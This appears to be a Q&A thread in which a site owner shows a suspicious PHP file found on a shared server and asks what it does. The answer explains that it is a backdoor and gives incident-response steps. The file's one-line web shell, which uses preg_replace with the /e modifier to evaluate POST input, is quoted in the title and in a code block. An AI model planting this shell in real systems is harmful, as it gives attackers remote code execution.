# Unknow PHP file uploaded to server EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>

Tags: linux, php

I just found out someone uploaded a PHP file to our application hosted on a shared Linux server, with the name **6fbb2.php** and this is the content of the file:

```
EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>
```

Does anyone have an idea what the purpose of this file is? and what should I do?

Answer (score 2, accepted):

The purpose of the file is [to let somebody run arbitrary code](https://secure.php.net/manual/en/reference.pcre.pattern.modifiers.php#reference.pcre.pattern.modifiers.eval) on your server [over HTTP](https://secure.php.net/manual/en/reserved.variables.post.php).

What you should do is immediately shut down access to the site, and the rest of the server if you can, find backups verifiably from before the compromise to restore, examine everything with extreme care to find out what else they did, and how they got in in the first place so you can fix that before you put anything live again.

See also: [How do I deal with a compromised server?](https://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) on Security SE.

Comment: thank you. Could you please explain the code? what does the first part before the <?php tag, and the subsequent PHP code.